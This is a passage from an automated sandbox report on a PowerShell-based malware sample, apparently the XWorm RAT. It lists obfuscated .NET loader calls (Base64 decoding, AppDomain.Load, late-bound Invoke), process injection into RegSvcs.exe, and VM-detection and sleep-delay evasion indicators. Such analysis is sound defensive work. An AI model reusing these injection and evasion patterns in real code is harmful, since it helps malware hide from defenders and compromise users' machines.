              Source: Binary string: System.Management.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.pdb4 source: WERA716.tmp.dmp.12.dr
              Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: @ko.pdb source: RegSvcs.exe, 00000005.00000002.2960924390.0000000004F2A000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WERA716.tmp.dmp.12.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WERA716.tmp.dmp.12.dr

              Data Obfuscation

              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.JAcwvugr7yueKabGzBseGV7hjHu3W5QkNTNx8sjM423vV0qUPhEfZ5MkLIEJU4xShmmuAovdOhpox4n3YIsmafGmDjbdd,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ._0L8f3WleevzcnPl9n2WNh7NW3wKOwPuy3tb1aRsXW0f6uDBis6nnThh3XPCCqA67oaXX8IvfAGwXsJMVtwgg9Ni2DmPT8,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.AXmSpip9Rgys9UoRCdGDlWOrb1oWCmZg9LzuKvf7aAgnKzemNYUyaBbirLIHk9vkM1Q5MLhWeOn1dI5xukaKG5mOVcOdq,BVATFifTpLLdrEgagPCqj07O4YZaqnifocDc1Ai582wi6IE85R4oo6JIyPcw0vYx9Cwp9Scj9TDAHeruFk2uBdYRexkOZ.pdozcqiNcmOnTnX1sUHm37yRWYhfKxfHJgJzzWfK4H9V6gQ9zRXQa28p93aV0bU5xPMwelYaDwx7MaHuT0cauWHxV6Umo,QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.ZUrIm4Kp1Nn4jNQE1iMoBcsuerfZEYytj3QZ()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[2],QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.sOh0Jlwra2Jn4MOGwAe1E2VHcq3RkFs1RAqN(Convert.FromBase64String(YEqzscG0zcPqbAz0DZOo4YlGXPhJyHTNqYyr[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn System.AppDomain.Load(byte[])
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | .Net Code: ZXM1GiAbCs2MG58yBipqRw6sU19wHUENOsMn
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB126FDC push eax; iretd 0_2_00007FFAAB126FDD
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB12A0B1 push cs; ret 0_2_00007FFAAB12A0E9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB12AB3C push es; iretd 0_2_00007FFAAB12AB67
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFAAB12C752 pushfd ; ret 0_2_00007FFAAB12C757
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D58080 push eax; iretd 5_2_00D58081
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 5_2_00D54CC8 pushad ; retf 5_2_00D54CD1
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.cs | High entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | High entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | High entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.cs | High entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | High entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.cs | High entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.21380403568.0.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.cs | High entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, b02VErUOAyp7KgsN3bFDF2auprIqAGCLaGMp.cs | High entropy of concatenated method names: 'INkezmr6hizs7DYFjV4aAMMuO4B8vcIzpRzl', '_1UgweADLCOTyFcav1bCSPpZmBT2YjbCvAU2a', 'N38ShQwEPMzDIeuhJy4EphCuYO22ULsDR4AR', 'VQJXMcVFd751mpqtfhNss', 'MoXo9dtjQWauKcR4tF0QZ', '_9KThUWSyhPoAhybqdEEGn', 'ZOGHWakUiTGxpDEMxkgVq', 'VbdrNDJi8xPxLw2mCoL5G', 'ZDOPOAfhNiZba9q2wF0zk', 'gLT3eh2G9sbPPYX5MS02M'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, ecfzk1BLTMVYPDpfIlTKGWKme1YqqZGoyQ7Vc33TJphCOCCj76EqW1abpBIyhIQ4ZDwplcAJv1P6YGgTLqEZyNFN0Yjag.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'aBhmG8hesQRZx5swb8QklvJR7WenRTLT4PpJ', 'J3SeuSTYALTr3yfRGGRIng8jjRcOlYfMvoE8', 'EoOkNZdPQEWcWFnAib8PkZw6yS7hompPojzR', 'FJElkQ5aMB1hwH9O2Q9GR2Cz4GaNeyxzx8iv'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, YEvg1ghr5oE7q291wupcmyp3OMXXDn6VzNcS.cs | High entropy of concatenated method names: 'ACdeIzXseyPo4zWqWy02RazcDiWaeYEF3sMU', 'KU6ebjx3tSHR1sS58Bl74qLknJYhh6poBC0K', 'N1sexz3RI1DpSUs8sFctRkct2k71o6Dw5adn', 'UqsaOcNK4UPWrSnz315O3fHPN7hmKXXzM5ek', 'JVZHi2GrdZvpd6rLMCYrVVcMGmoHeoBq6p3H', 'pyZ9AMn9R81CWO7jWKyfev1oi7ghwwdSnb3i', 'qZ6RmsuveDKUm2nZ6abIPK0CPfRROfax8QwG', 'NKRNz1jRg2dg9416sbsJ9O1Prxh7Ujl233zE', 'ai8NTPVbOPHKdfOoapJOEteWyRNHxMPPWDhT', 'NvDSL0KgPKbgoTgffwjCGHfA0D7JbHNtdeDP'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, 8zNojDlPt46QazeXuL2Y6OFYWD4q0R1PB0Jr.cs | High entropy of concatenated method names: 'Vl7IYPbs0k94qffFzhKGetVhWAXE2DuwFW3Z', '_0Byrd5Yenv0fM67D8WjMm', 'FTmqyKQFF2nZLlpTlQxHj', 'ycVPE2G11CcWkNNNsiscT', '_1Ou3AbDogGuZOToO0DEh1'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, tSBhnwvdpxEXyJxA8lGv4Bgp4p8TME6qQQXq.cs | High entropy of concatenated method names: 'NxpU6fdmEe350QRzSjmBG9bNgqiTmTVt3HvB', '_0iGLzTupk4oCtdljtdO0J', 'GH26cbm9WLUxhV866JkHg', '_41oPTrdIImlCUF6BZDilb', 'sy473pUm38ZS8xSNy8qaL'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, QaWqpUWtixIY480pbeOtn5Zr4D7gzBZcHLuj.cs | High entropy of concatenated method names: 'J8wHw2osnqTKiwkc3AZR8dJNxdbogdSKtxmF', 'qRcvRLsx0rxBIjhYsY9PC5vCWjsb8g2zuOH7', 'hLvrRQnXSt6R0bWy2ezji7tuxQIXN8qZ0RVf', 'ceHhszv7a2pCt2179HvaC23Hie2toqek6kQm', 'rMQUqeCYVWFCeYXZemrUiFJninSg7w4dNwcp', 'w5OdajmqiE1M7BW3IMdtUvegP99kuNYpO8vy', 'BjIxTPFBlXVTDrgqc7l5EYgWBO9QbMzlkizN', 'Su3QHI7NRcYJwIpsPYz5ohtFr2qfwzPcRLZJ', 'vABejWKfbSdGkHO9pNjXKLu0vDNBKiHgCRXA', '_5rpp77KCzZlHIngjWeMz70hTryBV4kjkB21s'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, Ovf0N5CQI1OINhI7lGry0rZm9kRY1ouImX1rRJDUauSsRBy7XEy1Vt7xi5mHlsT56DNCiId2YJlUZmsE23x0zAxkvKtDD.csHigh entropy of concatenated method names: 'U5sr0xpHdPhDSSbzFhxVIzRWeUyjHKaz7fC1kB0zXHJhnGI0CUd6SU5JrE3jDkMuJaZ7EPji9ym2R2XoRsaHYn1rH30jX', '_1uaG3Jmqcbu2z3C6aXj7JDQp2ADrLzHvGZEbDAKFqxfCBIw8pqHWCSMAzwDlV7JEVIKw2jbg6Y6KWsHnPlqFhGkgkWgUO', 'zQW9aPhZQcTvVUKWPGF2Lx6BnGfcxuOWukqHMV5NabLvy73gvdWFFJrw8wap5tuyfzFK81X3Lcq2tDHNKzdH2wLMcfc6J', '_4evsVFwMgy4n0x0cZfFsT', 'bqSHGcZwiXLgYoIjsUGSg', 'Wgka3ShlAx39hjLg9aMl6', '_1GVuR1tPkrWg5WEjE8zNi', 'Gf4QevTLf6VvSRMQTyTwD', 'pLeUDmoCnx132zeKo40LY', 'OnEtj15FfkoF6zFGMzPj9'
              Source: 0.2.powershell.exe.213812227a0.2.raw.unpack, iHb4sM6YGQ9c4dJp0PcDcTbymDMrcNDmdcyptmWABN6esl0n9Gq730slwRvMQhBj9S7AVAKLOj0nx1lNlgFo1hvIZSqHt.csHigh entropy of concatenated method names: 'xIeDGhWJh2dTLJj2KIKIkFlXgJ7yVJFMa5ZsnMElaczn389Ab5jcRZjYkKt4ktw9FQNKLIiNSjxfAYBeFydeIuEsxRDU0', 'iidSY7kDOs5FStDZNmRMEjt7glMgsaLCx80cm1y6v2rBQX100VXnfdgl8ByYbIq1ko8jZmN3f7W1XVjrN27WQa2rilPm8', 'FExflqz2ggYzAB8RkhZzQMhxx6cV08pL74aeNkOLC16P1A5u4mPbh4a9MT8ExggxPZvlSo1Qtx8QnVUuKM1ZGz1xvvbVE', 'GrEs6aQJtRM5DVNA9OStPBAI69B70MrCQV4OAAGaHOcugd3H2svSK0xh9ENhsIxRZzNDGBo079U7lkA0mxcejrA46fvwu', 'jXQ7CW5pazCc1V0AEwdp5SnRJDYF7u5sZpU1n9bZRSjgDRix2AIbxFkub0H4SD8hHRAob5vbVGbs5kHrIA0a7heeGQbl7', 'glsn8zXWNedoYiCWR7ggZIm7mZY5mNmOoEyXSr6Gd9iu88DRgb03GoD5Jw1HVc9eduqMCd7d76L4cERmtSvnznvJHtpF0', 'iccNNeoF51wTxbpATnVFbAdt8d8MulXIqrA55pnFvGlLeEqiiqogIHyvrrBCs4jIsjlfOXE0IFpBmAe8fJwMIuIbeX9Kf', 'jZpp5aIkL5DUHdMmI7HQBPJ6EmvQxikeAD4IAgyMBLIyLX0x1fcGkG6MTlxst0p7C61krxBu4e1dGyIgXSrjFGo1hTvqR', 'pXBe9HFDtAdZotphcgbdt1jtfMAXkED5dptTH1HtOoBwh5VCyGpNPIeDaGpQRtHO5QEcup2bma2XS7Ndj7k2FVaPEumb1', 'Q1EltKwM1R3yq1zXEHilAmDHGT4S5fhl21UG'

              Persistence and Installation Behavior

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (89 occurrences)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Process information set: NOOPENFILEERRORBOX (59 occurrences)
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (5 occurrences)
              Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX (51 occurrences)

              Malware Analysis System Evasion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3403
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Window / User API: threadDelayed 3398
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Window / User API: threadDelayed 5630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Window / User API: threadDelayed 4203
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7536 -- Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468 -- Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\conhost.exe -- Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- File Volume queried: C:\ FullSizeInformation
Source: Amcache.hve.12.dr -- Binary or memory string: VMware
Source: Amcache.hve.12.dr -- Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.12.dr -- Binary or memory string: vmci.syshbin
Source: Amcache.hve.12.dr -- Binary or memory string: VMware, Inc.
Source: Amcache.hve.12.dr -- Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.12.dr -- Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.12.dr -- Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.12.dr -- Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr -- Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr -- Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.12.dr -- Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.12.dr -- Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RegSvcs.exe, 00000005.00000002.2951606956.0000000000AF8000.00000004.00000020.00020000.00000000.sdmp -- Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.12.dr -- Binary or memory string: vmci.sys
Source: Amcache.hve.12.dr -- Binary or memory string: vmci.syshbin`
Source: Amcache.hve.12.dr -- Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.12.dr -- Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.12.dr -- Binary or memory string: VMware20,1
Source: Amcache.hve.12.dr -- Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.12.dr -- Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.12.dr -- Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.12.dr -- Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.12.dr -- Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.12.dr -- Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.12.dr -- Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.12.dr -- Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.12.dr -- Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.12.dr -- Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.12.dr -- Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.12.dr -- Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process information queried: ProcessInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Process queried: DebugPort
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe -- Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 40E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 410000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7D7008
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdns
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -- Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: RegSvcs.exe, 00000005.00000002.2953943377.000000000298E000.00000004.00000800.00020000.00000000.sdmp -- Binary or memory string: q'PING!<Xwormmm>Program Manager<Xwormmm>0
